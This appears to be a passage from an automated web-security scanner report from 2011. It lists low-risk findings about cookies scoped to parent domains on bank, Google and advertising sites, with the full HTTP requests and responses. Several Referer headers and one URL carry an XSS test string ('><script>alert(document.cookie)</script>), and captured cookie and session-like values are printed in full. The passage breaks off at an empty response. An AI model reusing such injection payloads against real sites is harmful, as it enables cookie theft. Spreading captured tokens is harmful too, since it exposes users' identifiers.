The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/login.aspx HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 4559 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 167 Content-Type: text/html; charset=utf-8 Expires: -1 Location: /Public/Reidentify/ReidentifyFilterView.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:53 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/Reporting.js HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 70473 Content-Type: application/x-javascript Content-Location: https://chaseonline.chase.com/js/Reporting.js Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT Accept-Ranges: bytes ETag: "02ebcc77295cb1:51e6" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:01:52 GMT Connection: close
var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAAG9kfZvLTzdTC1gh7mvNeo8.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ipboard+software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:13 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1 Host: jpmorganchase.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 01:02:55 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 01:02:55 GMT Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www11 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=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!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:59:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Wed, 02 Feb 2011 22:59:53 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/place HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /set_beta HTTP/1.1 Host: maps.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:03:15 GMT Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 3344
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Expires: Thu, 03 Feb 2011 01:04:34 GMT Date: Thu, 03 Feb 2011 01:04:34 GMT Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _rtok=pcSl80AzCFK1; Path=/; HttpOnly Set-Cookie: S=photos_html=3TxB0OJcIel5X3seqPZpgw; Domain=.google.com; Path=/; HttpOnly Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home?q=bluefin+tuna&hl=en&tab=nq HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Expires: Thu, 03 Feb 2011 01:04:34 GMT Date: Thu, 03 Feb 2011 01:04:34 GMT Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _rtok=XOdbNb214OeD; Path=/; Secure; HttpOnly Set-Cookie: S=photos_html=rilNzQiMmc74Pq981rH-LQ; Domain=.google.com; Path=/; Secure; HttpOnly Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Thu, 03 Feb 2011 01:26:00 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguP
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 170 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://online.cardmemberservices.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 162 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://chaseonline.chase.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
